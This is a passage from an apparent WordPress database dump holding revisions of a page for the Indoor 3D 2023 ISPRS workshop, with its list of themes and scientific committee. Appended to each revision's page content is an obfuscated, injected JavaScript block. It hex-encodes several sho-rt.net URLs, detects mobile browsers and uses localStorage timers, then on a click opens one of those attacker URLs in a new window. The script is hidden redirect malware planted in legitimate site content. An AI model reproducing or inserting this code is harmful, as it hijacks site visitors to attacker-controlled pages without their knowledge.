_0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:50:38','2022-10-07 21:50:38','',2586,'https://gsw2023.com/?p=2609',0,'revision','',0),
(2610,1,'2022-10-07 21:53:42','2022-10-07 21:53:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\"><strong>CHAIR</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Secretary</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"3/4\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:53:42','2022-10-07 21:53:42','',2586,'https://gsw2023.com/?p=2610',0,'revision','',0),
(2611,1,'2022-10-07 21:56:14','2022-10-07 21:56:14','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">Secretary</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 